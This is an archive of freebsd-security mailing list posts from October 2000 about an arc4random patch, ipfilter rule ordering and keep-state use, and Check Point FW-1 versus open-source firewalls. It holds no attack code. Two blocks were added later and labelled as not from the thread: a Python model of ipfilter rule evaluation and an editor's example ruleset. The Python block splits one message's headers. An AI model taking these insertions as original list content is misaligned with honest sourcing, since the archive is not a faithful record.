Cc: stable@freebsd.org
Subject: 2.2.x FreeBSD-SA-00:52 patch adjusted
Message-ID: <20001006161944.C272@fw.wintelcom.net>

Because of serious breakage in the arc4random code in FreeBSD-current (3
months and counting), my initial patch to 2.2.x was flawed because the
arc4random code would never re-seed itself properly. This problem could
possibly lead to more easily predicted sequences.

I've just added another patch that should alleviate the problem. Just for
reference, make sure src/sys/libkern/arc4random.c has this ID tag:

$FreeBSD: /c/ncvs/src/sys/libkern/arc4random.c,v 1.6.4.2 2000/10/06 22:49:54 alfred Exp $

That would be arc4random.c MFC'd from -stable (FreeBSD 4) where it should
be working properly.

Thanks to Kris Kennaway (kris@freebsd.org) for pointing out this error and
suggesting the fix.

My apologies to those who already cvsup'd and rebooted their 2.2.x boxes.

--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
"I have the heart of a child; I keep it in a jar on my desk."

From owner-freebsd-security Fri Oct 6 16:48:33 2000
Subject: Re: cvs commit: src/etc inetd.conf
In-Reply-To: "from Walter Hop at Oct 3, 2000 03:40:54 am"
To: Walter Hop
Date: Fri, 6 Oct 2000 16:48:25 -0700 (PDT)
Cc: Michael Bryan, security@FreeBSD.ORG
From: Dima Dorfman
Message-Id: <20001006234825.38B271F20@static.unixfreak.org>

> [in reply to Michael Bryan, 02/10/00]
> > If any port has a listener on it, as an admin you'd better know what that
> > listener is
>
> This shell script should be in the base ;)
>
> lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | uniq

Only one problem: lsof isn't in the base system.

Regards

--
Dima Dorfman
Finger dima@unixfreak.org for my public PGP key.
"If you understand everything, you must be misinformed." -- Japanese Proverb

From owner-freebsd-security Fri Oct 6 19:15:36 2000
Date: Fri, 6 Oct 2000 20:48:07 +0200
From: Gerhard Sittig
To: freebsd-security@FreeBSD.ORG
Subject: Re: Default Deny
Message-ID: <20001006204807.M31338@speedy.gsinet>
In-Reply-To: <39DCC1CB.5FDD7F90@allmaui.com>

On Thu, Oct 05, 2000 at 18:00 +0000, Craig Cowen wrote:
>
> [ ... you reminded us of your previous post ... ]
>
> I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my
> kernel. When using ipnat, I have 'pass in on (private
> interface) from 192.168.0.0/24 to any keep state' in my rules.

If this rule is a citation, you should have gotten it rejected by
ipf. As soon as you want to "keep state" you have to specify one
of the tcp / udp / icmp protocols (don't know right now if "from
IP" will work with a specified protocol, either).

If this was off your mind, please make sure you tell us about
your setup correctly; until then nobody could really help.

> I have no rules specified for the public interface.
> The boxen behind the firewall can surf.

If *this* works, I could see a chance for
- ipf not being active at all or
- ipf being absolutely open

Did you build the kernel after setting IPFILTER_DEFAULT_BLOCK (no
kidding here), did you install it, did you boot it? What does
'ipf -V' tell you? What does 'ipfstat -in; ipfstat -on' tell
you? Editing config files is one thing, loading these settings is
another. That's why one always asks the system about its vision
and not the admin about his intention. :)

Have you read the ipf howto? It's very comprehensive and
helpful, even for those not employing ipfilter. It has lots of
basics, too, and should be recommended reading for anyone setting
up a packet filter.

virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
--
If you don't understand or are scared by any of the above
ask your parents or an adult to help you.

From owner-freebsd-security Fri Oct 6 19:42:14 2000
Message-ID: <39DE8D1B.923D86DF@allmaui.com>
Date: Fri, 06 Oct 2000 19:40:27 -0700
From: Craig Cowen
To: Gerhard Sittig, "freebsd-security@FreeBSD.ORG"
Subject: Re: Default Deny
In-Reply-To: <20001006204807.M31338@speedy.gsinet>

I appreciate your response and your questions.
Yes I did compile and install.
You sound like me talking to my users at work.

ipf -V:
ipf: IP Filter: v3.4.8 (264)
Kernel: IP Filter: v3.4.8
Running: yes
Log Flags: 0 = none set
Default: block all, Logging: available
Active list: 0

hopefully paranoia hasn't ruined this

ipfstat -in
@1 pass in on lo0 proto tcp from 127.0.0.1/32 to 127.0.0.1/32
@2 pass in on lo0 proto udp from 127.0.0.1/32 to 127.0.0.1/32
@3 pass in on lo0 proto icmp from 127.0.0.1/32 to 127.0.0.1/32
@4 block in log on xl0 proto tcp from 134.122.0.0/16 to publicinterface/32
#these 3 lines are to keep the guys at work out explicitly
@5 block in log on xl0 proto udp from 134.122.0.0/16 to publicinterface/32
@6 block in log on xl0 proto icmp from 134.122.0.0/16 to publicinterface/32
@7 block in log on xl0 proto tcp from any to publicinterface/32
@8 block in log on xl0 proto udp from any to publicinterface/32
@9 block in log on xl0 proto icmp from any to publicinterface/32
@10 pass in on xl0 proto tcp from desktop@work/32 to publicinterface/32
@11 pass in on xl0 proto udp from desktop@work/32 to publicinterface/32
@12 pass in on xl0 proto icmp from desktop@work/32 to publicinterface/32
@13 pass in on dc0 proto tcp from 192.168.1.0/24 to any keep state
@14 pass in on dc0 proto udp from 192.168.1.0/24 to any keep state
@15 pass in on dc0 proto icmp from 192.168.1.0/24 to any keep state

ipfstat -on
@1 pass out on lo0 proto tcp from 127.0.0.1/32 to 127.0.0.1/32
@2 pass out on lo0 proto udp from 127.0.0.1/32 to 127.0.0.1/32
@3 pass out on lo0 proto icmp from 127.0.0.1/32 to 127.0.0.1/32
@4 pass out log quick proto tcp from publicinterface/32 to any keep state
#This is necessary to allow me to surf out from my firewall box
@5 pass out log quick proto udp from publicinterface/32 to any keep state
#with these commented out I am still able to surf from inside
@6 pass out log quick proto icmp from publicinterface/32 to any keep state
@7 pass out on dc0 proto tcp from 192.168.1.0/24 to 192.168.1.0/24
@8 pass out on dc0 proto udp from 192.168.1.0/24 to 192.168.1.0/24
@9 pass out on dc0 proto icmp from 192.168.1.0/24 to 192.168.1.0/24

I use this to reload my settings after changes

#!/bin/sh
ipf -D
ipf -Fa -f /etc/ipf.conf -E
ipnat -CF -f /etc/ipnat.conf

I have read the howto, that is how I got this far.
I was a little shocked when I saw the results of being able to surf.

Thanks for your help,
Craig

Gerhard Sittig wrote:
> On Thu, Oct 05, 2000 at 18:00 +0000, Craig Cowen wrote:
> >
> > [ ... you reminded us of your previous post ... ]
> >
> > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my
> > kernel. When using ipnat, I have 'pass in on (private
> > interface) from 192.168.0.0/24 to any keep state' in my rules.
>
> If this rule is a citation, you should have gotten it rejected by
> ipf. As soon as you want to "keep state" you have to specify one
> of the tcp / udp / icmp protocols (don't know right now if "from
> IP" will work with a specified protocol, either).
>
> If this was off your mind, please make sure you tell us about
> your setup correctly; until then nobody could really help.
>
> > I have no rules specified for the public interface.
> > The boxen behind the firewall can surf.
>
> If *this* works, I could see a chance for
> - ipf not being active at all or
> - ipf being absolutely open
>
> Did you build the kernel after setting IPFILTER_DEFAULT_BLOCK (no
> kidding here), did you install it, did you boot it? What does
> 'ipf -V' tell you? What does 'ipfstat -in; ipfstat -on' tell
> you? Editing config files is one thing, loading these settings is
> another. That's why one always asks the system about its vision
> and not the admin about his intention. :)
>
> Have you read the ipf howto? It's very comprehensive and
> helpful, even for those not employing ipfilter. It has lots of
> basics, too, and should be recommended reading for anyone setting
> up a packet filter.
>
> virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76
> Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
> --
> If you don't understand or are scared by any of the above
> ask your parents or an adult to help you.

From owner-freebsd-security Fri Oct 6 21:28:28 2000
Date: Fri, 6 Oct 2000 21:28:15 -0700
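Craig's posted ruleset, walked by a small model of ipfilter's evaluation order (the last matching rule decides unless a rule says quick, and a "keep state" pass lets later packets of that flow skip the rules), added here as an example and not code from the thread. The interface names and 134.122.0.0/16 are from his listing; the addresses standing in for publicinterface and desktop@work, the remote web server, and the simplified state handling (per flow, NAT ignored) are assumptions.

```python
# Added example, not code from the thread: a small model of how ipfilter walks
# a rule list, used to trace the ruleset Craig posted.  Modelled semantics:
# rules are tried in order and the LAST matching rule decides, unless a
# matching rule says "quick", which ends the walk; with no match the kernel
# default applies (block, as with IPFILTER_DEFAULT_BLOCK); a "keep state" pass
# records the flow so later packets of it, either way, skip the rules.  NAT is
# ignored, state is per flow rather than per interface, and constructed
# addresses stand in for the placeholders "publicinterface" and "desktop@work".
from collections import namedtuple
import ipaddress

PUBLIC = "203.0.113.5"      # constructed, stands in for "publicinterface"
DESKTOP = "134.122.10.20"   # constructed, stands in for "desktop@work"
ANY = ipaddress.ip_network("0.0.0.0/0")

Packet = namedtuple("Packet", "direction iface proto src dst")
Rule = namedtuple("Rule", "action direction quick iface proto src dst keep_state")


def matches(r, p):
    return (r.direction == p.direction and (r.iface is None or r.iface == p.iface)
            and r.proto == p.proto and ipaddress.ip_address(p.src) in r.src
            and ipaddress.ip_address(p.dst) in r.dst)


def parse_rule(text):
    """Parse the subset of ipf.conf syntax that appears in the thread."""
    w = text.replace("publicinterface", PUBLIC).replace("desktop@work", DESKTOP).split()
    iface, quick, i = None, False, 2
    while w[i] in ("log", "quick", "on"):  # optional keywords before "proto"
        if w[i] == "quick":
            quick = True
        elif w[i] == "on":
            i, iface = i + 1, w[i + 1]
        i += 1
    assert w[i] == "proto" and w[i + 2] == "from" and w[i + 4] == "to"
    net = lambda s: ANY if s == "any" else ipaddress.ip_network(s)
    return Rule(w[0], w[1], quick, iface, w[i + 1], net(w[i + 3]), net(w[i + 5]),
                "keep" in w[i + 6:])


def flow(p):
    return (p.proto, frozenset((p.src, p.dst)))  # one entry covers both directions


class Filter:
    def __init__(self, in_rules, out_rules, default="block"):
        # separate lists, numbered from 1 like "ipfstat -in" / "ipfstat -on"
        self.rules = {"in": [parse_rule(r) for r in in_rules],
                      "out": [parse_rule(r) for r in out_rules]}
        self.default, self.state = default, set()

    def decide(self, p):
        """Return (verdict, credit): credit is the @number of the rule that
        decided, 0 for the kernel default, or "state" for a state-table hit."""
        if flow(p) in self.state:
            return ("pass", "state")
        rules, verdict, credit = self.rules[p.direction], self.default, 0
        for n, r in enumerate(rules, 1):
            if matches(r, p):
                verdict, credit = r.action, n
                if r.quick:
                    break
        if verdict == "pass" and credit and rules[credit - 1].keep_state:
            self.state.add(flow(p))
        return (verdict, credit)


# Craig's "ipfstat -in" / "ipfstat -on" listings: every line comes as a
# tcp/udp/icmp triple, in the order he posted them (@1..@15 and @1..@9).
IN_RULES = [r.replace("PROTO", p) for r in (
    "pass in on lo0 proto PROTO from 127.0.0.1/32 to 127.0.0.1/32",
    "block in log on xl0 proto PROTO from 134.122.0.0/16 to publicinterface/32",
    "block in log on xl0 proto PROTO from any to publicinterface/32",
    "pass in on xl0 proto PROTO from desktop@work/32 to publicinterface/32",
    "pass in on dc0 proto PROTO from 192.168.1.0/24 to any keep state",
) for p in ("tcp", "udp", "icmp")]
OUT_RULES = [r.replace("PROTO", p) for r in (
    "pass out on lo0 proto PROTO from 127.0.0.1/32 to 127.0.0.1/32",
    "pass out log quick proto PROTO from publicinterface/32 to any keep state",
    "pass out on dc0 proto PROTO from 192.168.1.0/24 to 192.168.1.0/24",
) for p in ("tcp", "udp", "icmp")]


def swap_block_groups(in_rules):
    """Reordering: run the block-any triple before the 134.122.0.0/16 triple."""
    return in_rules[:3] + in_rules[6:9] + in_rules[3:6] + in_rules[9:]


def trace(in_rules=IN_RULES):
    f = Filter(in_rules, OUT_RULES)
    work_host = Packet("in", "xl0", "tcp", "134.122.99.1", PUBLIC)   # constructed
    desktop = Packet("in", "xl0", "tcp", DESKTOP, PUBLIC)
    lan_req = Packet("in", "dc0", "tcp", "192.168.1.7", "198.51.100.9")  # constructed
    fwd_req = Packet("out", "xl0", "tcp", "192.168.1.7", "198.51.100.9")
    return {
        "work_host": f.decide(work_host),  # blocked, but the LAST match is credited
        "desktop": f.decide(desktop),      # @4 and @7 block it, @10 is last: pass
        "fwd_cold": Filter(in_rules, OUT_RULES).decide(fwd_req),  # no out rule fits
        "lan_req": f.decide(lan_req),      # @13 passes and creates state
        "fwd_req": f.decide(fwd_req),      # same flow leaves xl0 on the state entry
    }
```

The fwd_cold/fwd_req pair is why the inside hosts still surf with the @4-@6 out rules commented out: no out rule on xl0 matches a 192.168.1.x source, and the forwarded packet passes only on the state entry created by @13. swap_block_groups() applies the reordering David suggests later in the thread, after which a work host's packet is credited to the 134.122.0.0/16 rule rather than the block-any rule.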
From: "Crist J . Clark"
To: Drew Derbyshire
Cc: security@FreeBSD.ORG
Subject: Re: sockstat (was Re: cvs commit: src/etc inetd.conf)
Message-ID: <20001006212815.P25121@149.211.6.64.reflexcom.com>
In-Reply-To: <002101c02f99$a04b6010$94cba8c0@hh.kew.com>

On Fri, Oct 06, 2000 at 09:30:43AM -0400, Drew Derbyshire wrote:
> > And to paraphrase an earlier comment by DES,
> > "Funny way to say sockstat | fgrep '*.*'" :)
>
> Urp!
>
> sockstat seems to truncate port numbers on the FOREIGN ADDRESS under 4.1
> release ...
>
> USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
> postfix  smtpd    44199    4 tcp4   *.25                  *.*
> root     sshd     44004    4 tcp4   192.168.203.135.22    192.168.203.148.13
> socks    socks5   43989    5 tcp4   192.168.203.135.10    *.*
> socks    socks5   43989    6 tcp4   192.168.203.135.10    192.168.203.145.10
> socks    socks5   43989    7 tcp4   24.218.227.234.311    205.188.6.205.5190
>
> Looking at netstat for the ssh connection:
>
> tcp4       0     36  192.168.203.135.22     192.168.203.148.1302   ESTABLISHED

It's not really a sockstat(1) limitation. The field truncation happens in
netstat(1),

% netstat -Aan
Active Internet connections (including servers)
Socket   Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
c7c662e0 tcp4       0      0  64.6.211.149.3082      207.126.101.100.11     ESTABLISHED
[snip]

That second number is actually port 119.

--
Crist J. Clark                           cjclark@alum.mit.edu

From owner-freebsd-security Fri Oct 6 22:59:08 2000
Message-ID: <39DEBB51.E51BACFB@allmaui.com>
Date: Fri, 06 Oct 2000 22:57:37 -0700
From: Craig Cowen
To: "freebsd-security@FreeBSD.ORG"
Subject: Check Point FW-1

The big cheeses at work want to use Check Point instead of ipf or any
other open source solution.
Can anybody help me with vulnerabilities to this so that I can change
their minds?

From owner-freebsd-security Fri Oct 6 23:06:30 2000
Date: Fri, 6 Oct 2000 23:06:28 -0700
From: Gregory Sutter
To: Craig Cowen
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001006230628.L23587@klapaucius.zer0.org>
In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>

On 2000-10-06 22:57 -0700, Craig Cowen wrote:
> The big cheeses at work want to use Check Point instead of ipf or any
> other open source solution.
> Can anybody help me with vulnerabilities to this so that I can change
> their minds?

Go search the Bugtraq archives at http://www.securityfocus.com/ for lots
of Checkpoint fun.

Greg

--
Gregory S. Sutter                      The best way to accelerate Windows
mailto:gsutter@zer0.org                is at 9.8 m/s^2.
http://www.zer0.org/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Sat Oct 7 00:48:00 2000
From: Darren Reed
Message-Id: <200010070747.SAA26913@cairo.anu.edu.au>
Subject: Re: Check Point FW-1
To: craig@allmaui.com (Craig Cowen)
Date: Sat, 7 Oct 2000 18:47:45 +1100 (Australia/NSW)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>

In some mail from Craig Cowen, sie said:
>
> The big cheeses at work want to use Check Point instead of ipf or any
> other open source solution.
> Can anybody help me with vulnerabilities to this so that I can change
> their minds?

Tell them that IP Filter is the software which protects Firewall-1 from
the Internet when running on Solaris - you have to go with naked FW-1 on
NT. There are two factors to this equation, however. FW-1 is typically
deployed on Solaris/NT machines although now the Nokia box makes up a
large number of those sales. The Nokia boxes run IPSO which was, long
ago, FreeBSD (I'm told it no longer bears much resemblance).

Darren

From owner-freebsd-security Sat Oct 7 01:23:39 2000
Message-ID: <39DEDD2B.E5BF4463@allmaui.com>
Date: Sat, 07 Oct 2000 01:22:03 -0700
From: Craig Cowen
To: Darren Reed
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
References: <200010070747.SAA26913@cairo.anu.edu.au>

Thanks,
They are going to put it on an NT machine.
They don't trust ipfilter or anything else that is not commercial.
Maybe I could get some suits to guarantee it with a corporate label.
Craig

Darren Reed wrote:
> In some mail from Craig Cowen, sie said:
> >
> > The big cheeses at work want to use Check Point instead of ipf or any
> > other open source solution.
> > Can anybody help me with vulnerabilities to this so that I can change
> > their minds?
>
> Tell them that IP Filter is the software which protects Firewall-1 from
> the Internet when running on Solaris - you have to go with naked FW-1 on
> NT. There are two factors to this equation, however. FW-1 is typically
> deployed on Solaris/NT machines although now the Nokia box makes up a
> large number of those sales. The Nokia boxes run IPSO which was, long
> ago, FreeBSD (I'm told it no longer bears much resemblance).
>
> Darren

From owner-freebsd-security Sat Oct 7 02:32:06 2000
Date: Sat, 7 Oct 2000 02:32:44 -0700
From: Kris Kennaway
To: Michael Bryan
Cc: freebsd-security@freebsd.org
Subject: Re: cvs commit: ports/mail/pine4 Makefile (fwd)
Message-ID: <20001007023244.A11196@citusc17.usc.edu>
In-Reply-To: <39D671D9.62E7148B@ursine.com>

On Sat, Sep 30, 2000 at 04:06:01PM -0700, Michael Bryan wrote:
> Warner Losh wrote:
> >
> > Maybe we need a category that is "This program may be insecure, set
> > INSECURE_OK in your /etc/make.conf if you don't have a problem with
> > that" for ports.
>
> I don't like the idea of a setting that gets set once, then allows all
> insecure ports to get installed without additional user confirmation.

Me either. Each port is insecure in a different way.

> I'd much prefer an implementation that provided the following functionality:
>
> 1) By default, will not install a particular port if it is
>    marked as potentially dangerous, but will instead provide
>    a warning to the user/installer.
>
> 2) The user can do an override for that particular port to go
>    ahead and install it anyway. That override must not carry
>    over to other insecure ports, and it probably should not
>    carry over to future re-installs of the same port. (In other
>    words, each and every time you go to build/install an insecure
>    port, you have to do something to override the default lockout.)
>    That way, the admin/user gets reminded of the potential danger
>    at every reasonable point.

This is actually pretty similar to what I've been doing for insecure ports
which people may still want to install - the port pops up a dialog box at
port/package install-time explaining the issue and asking for confirmation
before proceeding. I think this strikes a good balance between security and
ease of use - although a notable downside is that the current incarnation of
sysinstall is not capable of playing well with packages which do this (the
dialog box is displayed over on vty2, but the actual screen display on vty1
doesn't indicate the port is interactive and awaiting a keypress).

Kris

From owner-freebsd-security Sat Oct 7 04:41:55 2000
Date: Sat, 7 Oct 2000 07:41:45 -0400
From: Chris Faulhaber
To: Craig Cowen
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001007074145.A59213@earth.causticlabs.com>
In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>

On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote:
> The big cheeses at work want to use Check Point instead of ipf or any
> other open source solution.
> Can anybody help me with vulnerabilities to this so that I can change
> their minds?
>

Ah, so your PHBs are security experts? Make sure their number is the
first one called when problems arise :)

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Sat Oct 7 08:49:44 2000
Date: Sat, 7 Oct 2000 17:49:09 +0200 (IST)
From: Roman Shterenzon To: Chris Faulhaber Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <20001007074145.A59213@earth.causticlabs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 7 Oct 2000, Chris Faulhaber wrote: > On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote: > > The big cheeses at work want to use check point instead of ipf or any > > other open source solution. > > Can anybody help me with vunerabilities to this so that I can change > > thier minds? > > > > Ah, so your PHB's are security experts? Make sure their number is the > first one called when problems arise :) Hi, Speaking for myself (Xpert are official ChekPoint dealer) I can say that although FW-1 might had some problems, it's quite good. It's quite secure as well (usually installed on Solaris/(sparc|i386) ) It's very easy in administration and has very nice GUI. It also includes VPN which makes it very useful for enterprise deployment. I think it's a good product after all. P.S. I once started making gui for ipfilter that resembles cp fw1, but didn't finish it.. --Roman Shterenzon, UNIX System Administrator and Consultant [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ]

From owner-freebsd-security Sat Oct 7 8:53:24 2000
Delivered-To: freebsd-security@freebsd.org
Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id A14AC37B502 for ; Sat, 7 Oct 2000 08:53:20 -0700 (PDT)
Received: from dialup-janus.css.qmw.ac.uk ([138.37.11.110]) by zeta.qmw.ac.uk with esmtp (Exim 3.02 #1) id 13hwHG-0003nT-00; Sat, 07 Oct 2000 16:52:47 +0100
Received: from david by dialup-janus.css.qmw.ac.uk with local (Exim 2.12 #1) id 13hwGN-000Njf-00; Sat, 7 Oct 2000 16:51:51 +0100
X-Mailer: exmh version 2.0.2 2/24/98
To: Craig Cowen
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-reply-to: Your message of "Sat, 07 Oct 2000 01:22:03 PDT." <39DEDD2B.E5BF4463@allmaui.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 07 Oct 2000 16:51:51 +0100
From: David Pick
Message-Id:
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> They are going to put it on an NT machine.
> They don't trust ipfilter or anything else that is not commercial.
> Maybe I could get some suits to guarantee it with a corporate label.

You can certainly get a support contract for FreeBSD - speak to BSDi.
I don't know if ipfilter would need to be specifically included or if
it is covered as a part of FreeBSD.

I'd also point out that in many cases the *real* situation is not that
they don't trust anything that's not commercial; they don't trust
anything *at all* and are really concerned that there is some external
company that they can point the finger of blame at and/or sue when/if
anything untoward *does* happen.

The other, less common, situation I've seen is that the bosses don't
want their local "expert" to be a real expert on whom they depend;
they're frightened you'll be able to override them with *their* bosses
and/or that you'll demand more money and make their budget(s) look bad;
or even earn more money than they do...

(Slightly) changing the subject: I've been looking at ipfilter myself
recently although I wouldn't claim to be an expert, and I'd make the
following comments on the rules you posted recently:

1) If the three rules you commented as "to keep the guys at work out
explicitly" are intended to keep a separate set of counts, &c, from the
next three rules that block *any* source; then I *think* you need to
reverse the two blocks of three because you haven't used the "quick"
keyword, and without that the rule that gains the credit is the *last*
rule that matches.

2) There's very little point in using "keep state" for *tcp* unless
you're doing so on the first call-setup packet. A "keep state" that
gets triggered on a subsequent packet will cause a state table entry
with incomplete status information and this will time out rather more
quickly, causing calls to jam for no good reason.
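[Editor's added illustration of the two points above; this is a constructed /etc/ipf.rules fragment, not part of David Pick's message or anything posted in this thread. The interface names (tun0 outside, fxp0 inside), the firewall address 192.0.2.10 and the 198.51.100.0/24 "guys at work" network are assumptions chosen for the example; the weak form is kept beside the corrected one as a comment.]

```ipf
# Constructed example for /etc/ipf.rules (IP Filter 3.x syntax).
# Assumed for this example only:
#   tun0             = outside interface
#   fxp0             = inside interface
#   192.0.2.10       = this firewall's public address
#   198.51.100.0/24  = the network to be blocked explicitly

# -- Point 1: without "quick", ipf walks the whole list and the LAST
#    matching rule is the one that decides (and gets the log entry and
#    the hit count).  Here the explicit block is always shadowed by the
#    catch-all that follows it.  Weak form, kept only as a comment:
# block in log on tun0 from 198.51.100.0/24 to any
# block in log on tun0 from any to any

# Corrected: "quick" ends evaluation at the first match, so the explicit
# rule decides, logs and counts.  It must also sit ahead of any pass
# rule (such as the ssh rule below) that it is meant to override.
block in log quick on tun0 from 198.51.100.0/24 to any

# -- Point 2: create TCP state only from the connection-opening SYN.
#    "flags S" is short for "flags S/AUPRFS": SYN set, ACK/URG/PSH/RST/FIN
#    clear.  A state entry created from a mid-stream packet is incomplete
#    and expires on the short timer, which is what stalls sessions.
pass out quick on tun0 proto tcp from any to any flags S keep state
pass in  quick on tun0 proto tcp from any to 192.0.2.10 port = 22 flags S keep state

# UDP and ICMP have no handshake; state from the first outbound packet
# is the right thing here.
pass out quick on tun0 proto udp  from any to any keep state
pass out quick on tun0 proto icmp from any to any keep state

# Loopback and the inside interface are unrestricted in this example.
pass in  quick on lo0  all
pass out quick on lo0  all
pass in  quick on fxp0 all
pass out quick on fxp0 all

# Default deny for everything else arriving on the outside interface.
block in log quick on tun0 all
```

Load it with `ipf -Fa -f /etc/ipf.rules`. `ipfstat -hio` prints the per-rule hit counters, which is where the shadowing in point 1 becomes visible (the catch-all accumulates the hits the explicit rule was meant to record), and `ipfstat -sl` lists the state table, so a stalled session created from a mid-stream packet can be seen sitting on the short timer.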
--
David Pick

From owner-freebsd-security Sat Oct 7 9:50:15 2000
Delivered-To: freebsd-security@freebsd.org
Received: from athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id EA22837B502 for ; Sat, 7 Oct 2000 09:50:09 -0700 (PDT)
Received: from localhost (jus@localhost) by athena.za.net (8.9.3/8.9.3) with ESMTP id QAA07698; Sat, 7 Oct 2000 16:51:21 GMT (envelope-from jus@security.za.net)
X-Authentication-Warning: athena.za.net: jus owned process doing -bs
Date: Sat, 7 Oct 2000 18:51:20 +0200 (SAST)
From: Justin Stanford
X-Sender: jus@athena.za.net
To: David Pick
Cc: Craig Cowen , "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Alternatively, if they won't bend to going non-commercial, take a look at
cequrux firewall (http://www.cequrux.com) - it is based on FreeBSD and
comes highly recommended from both the large and small companies that use
it. I know that UUNet-ZA uses them for their network. It is also well
priced.

Regards,
jus

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

From owner-freebsd-security Sat Oct 7 10:33:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from natto.numachi.com (natto.numachi.com [198.175.254.216]) by hub.freebsd.org (Postfix) with SMTP id D781337B503 for ; Sat, 7 Oct 2000 10:33:44 -0700 (PDT)
Received: (qmail 54923 invoked by uid 1001); 7 Oct 2000 17:33:04 -0000
Date: Sat, 7 Oct 2000 13:33:04 -0400
From: Brian Reichert
To: Craig Cowen
Cc: "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001007133304.B54883@numachi.com>
References: <39DEBB51.E51BACFB@allmaui.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <39DEBB51.E51BACFB@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 10:57:37PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Oct 06, 2000 at 10:57:37PM -0700, Craig Cowen wrote:
> The big cheeses at work want to use check point instead of ipf or any
> other open source solution.
> Can anybody help me with vulnerabilities to this so that I can change
> their minds?

I found that Checkpoint 4.0 (this may have changed) doesn't do NAT
right; it uses NAT across _all_ interfaces, instead of letting you pick
one. This means if you have two internal nets that are connected to the
firewall box, the traffic between them seems as if it's coming from the
public interface. This can confuse ACLs...

(You can, I suppose, Do the Right Thing, but their silly GUI tool
imposes a ton of work on you to accomplish it...)

--
Brian 'you Bastard' Reichert
37 Crystal Ave. #303            Daytime number: (603) 434-6842
Derry NH 03038-1713 USA         Intel architecture: the left-hand path

From owner-freebsd-security Sat Oct 7 10:38:41 2000
Delivered-To: freebsd-security@freebsd.org
Received: from natto.numachi.com (natto.numachi.com [198.175.254.216]) by hub.freebsd.org (Postfix) with SMTP id E24A337B66D for ; Sat, 7 Oct 2000 10:38:38 -0700 (PDT)
Received: (qmail 54976 invoked by uid 1001); 7 Oct 2000 17:38:04 -0000
Date: Sat, 7 Oct 2000 13:38:04 -0400
From: Brian Reichert
To: Roman Shterenzon
Cc: Chris Faulhaber , Craig Cowen , "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1
Message-ID: <20001007133804.C54883@numachi.com>
References: <20001007074145.A59213@earth.causticlabs.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from roman@xpert.com on Sat, Oct 07, 2000 at 05:49:09PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sat, Oct 07, 2000 at 05:49:09PM +0200, Roman Shterenzon wrote:
> Hi,
> Speaking for myself (Xpert are an official CheckPoint dealer) I can say that
> although FW-1 might have had some problems, it's quite good.
> It's quite secure as well (usually installed on Solaris/(sparc|i386) )

I've never installed it. I 'inherited' a CheckPoint box running
under Solaris, and, from an internal net had to break in to the
box to grant myself admin privs.

I got in because UNIX services under SunOS 5.6 were misconfigured.
That's not CheckPoint's fault. But I don't think it's fair to
claim that the presence of CheckPoint makes the box secure...

> --Roman Shterenzon, UNIX System Administrator and Consultant
> [ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

--
Brian 'you Bastard' Reichert
37 Crystal Ave. #303            Daytime number: (603) 434-6842
Derry NH 03038-1713 USA         Intel architecture: the left-hand path

From owner-freebsd-security Sat Oct 7 10:41:54 2000
Delivered-To: freebsd-security@freebsd.org
